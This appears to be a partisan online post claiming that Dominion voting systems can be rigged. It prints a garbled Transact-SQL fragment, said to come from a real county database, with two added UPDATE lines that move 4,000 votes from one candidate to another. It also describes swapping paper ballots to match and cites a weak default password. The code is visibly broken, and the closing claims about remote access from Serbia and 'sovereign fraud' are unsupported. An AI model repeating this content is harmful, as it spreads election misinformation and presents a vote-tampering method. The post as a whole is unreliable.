Showing the world right now how to rig a Dominion voting system to flip votes - how easy it is! Print out and show your election officials, county supervisors who bought these corrupt, junk systems. The code below is from a real, in-use Dominion voting system database located in a county in the USA. Two lines of code were added - the ones in bold beginning with "Update". If President Trump was choice no.1 and Biden no.2 the program below would simply subtract 4,000 votes from Trump and add it to Biden. Then simply take out 4,000 Trump ballots, replace with 4,000 Biden ballots and it is done. All the counts would match! But skeptics say you'd have to have access - no problem all the users are set to a full access Administration setting (for real). But you need a password - easy, the one on the system was 12345678. (note at the end). The code below is Transact-SQL, again the 2 lines in bold print were added by me to flip votes:
SUM(numberOfVotes) ,
1
FROM
#MinimalResults
GROUP BY
choiceID ,
contestId
PRINT ‘4. Add Totals finished ‘:
print CONVERT (char(25), GETDATE(), 13)
Update #MinimalResults SET numberOfVotes = numberOfVotes – 4000 where choice Id – 1
Update #MinimalResults SET numberOfVotes = numberOfVotes + 4000 where choiceId – 2
--Output all final results with strings
SELECT
Mr.choiceId AS choiceId,
Ch.name AS choiceName,
Ch.isDisabled AS isChoiceDisabled,
Mr.contestedId AS contestId,
Con.name AS contestName,
Sum(mr.numberOfVotes) AS numberOfVotes ,
Con.isDisabled AS isContestDisabled,
Con.isAcclaimed AS isContestAcclaimed,
a.internalMachineId AS arealId,
a.name AS areaName,
mr.isTotal AS isChoiceTotal,
mr.partyId AS partyId,
isNull(pp.name, ..) AS partyAbbreviation
isNull(pp.abbreviation, ..) AS partyAbbreviation
FROM
#MinimalResults mr
LEFT OUTER JOIN politicialParty pp ON mr.partyId – pp.internalMachineId,
--electionContainsOffices eco,
Office,
contestToOffice cto,
contest con,
contestChoices coch,
choice ch,
areaToContest atc, People have no idea how easy it is to rig computerized voting machines/systems. Now you know. Remember: Dominion's own emails prove they are accessing the voting machines sitting here in the USA from Belgrade, Serbia. You're going to be very surprised who else has been caught remote accessing, very surprised. It all traces to sovereign fraud.